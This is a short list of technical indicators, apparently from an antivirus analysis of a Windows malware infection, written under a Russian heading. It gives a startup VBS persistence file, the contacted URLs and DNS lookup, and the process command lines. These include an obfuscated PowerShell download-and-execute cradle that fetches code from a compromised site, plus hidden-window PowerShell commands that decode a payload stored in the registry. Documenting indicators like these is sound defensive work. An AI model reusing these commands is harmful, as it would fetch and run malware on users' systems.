Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\c.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://rubrica.com.uy/wp-admin/css/d')
- http://ru###ca.com.uy/wp-admin/css/d
- http://ru###ca.com.uy/wp-admin/css/c
- DNS ASK ru###ca.com.uy
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://rubrica.com.uy/wp-admin/css/d')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('{]{','1');[byte[]]$_0 = [System.Convert...' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\c.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('{]{','1');[byte[]]$_0 = [System.Convert...